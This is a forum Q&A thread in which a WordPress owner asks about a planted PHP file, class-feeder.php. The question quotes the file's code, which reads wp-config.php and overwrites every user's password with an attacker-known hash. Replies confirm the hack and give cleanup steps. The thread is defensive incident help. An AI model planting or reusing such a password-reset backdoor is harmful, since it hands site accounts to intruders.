# file is strangely added to my wordpress include folder

Tags: php, wordpress

I am very concerned about a file is being added and accessed, its says in my cpanel

I found that there was this class-feeder.php added in include folder and has a little code in it saying

```php
<?php
    include_once '../wp-config.php';
    $con=mysql_connect('localhost',DB_USER,DB_PASSWORD) or die(mysql_error());
    mysql_select_db(DB_NAME,$con) or die(mysql_error());
    $sql="Update wp_users set user_pass='$"."P"."$"."Bs4sdfEreymQasdfwMzJaasdfasdf4dj20'";
    mysql_query($sql,$con) or die(mysql_error());
?>
```

am I being hacked, because all my images in the upload folder is empty, please help

Answer (score 2):

Yes, you got hacked. Carefully follow [FAQ - My Site Was Hacked](https://codex.wordpress.org/FAQ_My_site_was_hacked) in the WordPress.org Codex, which includes changing all passwords, checking the database for `eval` code, replacing all core WordPress files and folders, evaluating your webhost for security, hardening WordPress, and more.

Answer (score 0):

Looks like this file is updating every password to use this hash 
`Bs4sdfEreymQasdfwMzJaasdfasdf4dj20` which means yes, your accounts (on your wordpress) are compromised.

Comment: this is terrible, you mean to say, they will know the password even if I change it?

Comment: No but the file reset all the passwords in wordpress to one that the intruder knows so he could get access, if the file was executed  the old passwords are likely to have been replaced, and you would have lostr access to your wordpress

Comment: I have 3 admins in the site, so he knows all three passwords?

Comment: I already deleted the file class-feeder.php and also I have changed the admin password, am I ok now?

Comment: Again he probably don't know the old password (Except if wordpress save the old password somewhere ), but it is likely that the informations link to the account have been compromised, emails, name. You also need to reset the password for all the accounts

Comment: And update your wordpress install that would have fixed the security issue that allowed that to happend in the first place. And check every file, it is likely that some malicious content was inserted in your blog (malware injection, malicious redirect)

Comment: I would also follow @songdogtech 's suggestion if I were you.

Comment: so the culprit here has an access and put the file on ftp probably? I think there is no way to add a file if you have no access to any right?

Comment: Probably uploaded the file via a wordpress vulnerability, (if your wordpress updated itself via ftp, consider reseting your ftp password), and yes there is way to add file via wordpress (plugins install)

Answer (score 0):

Yes you are hacked, Just delete this strange file and change your Wp backend, FTP and cpanel credentials as soon as possible.

Usually hackers also left some backdoors for again getting the access of website so also look or search for `eval` in your worpress files and figure out if there are any other strange file present or not.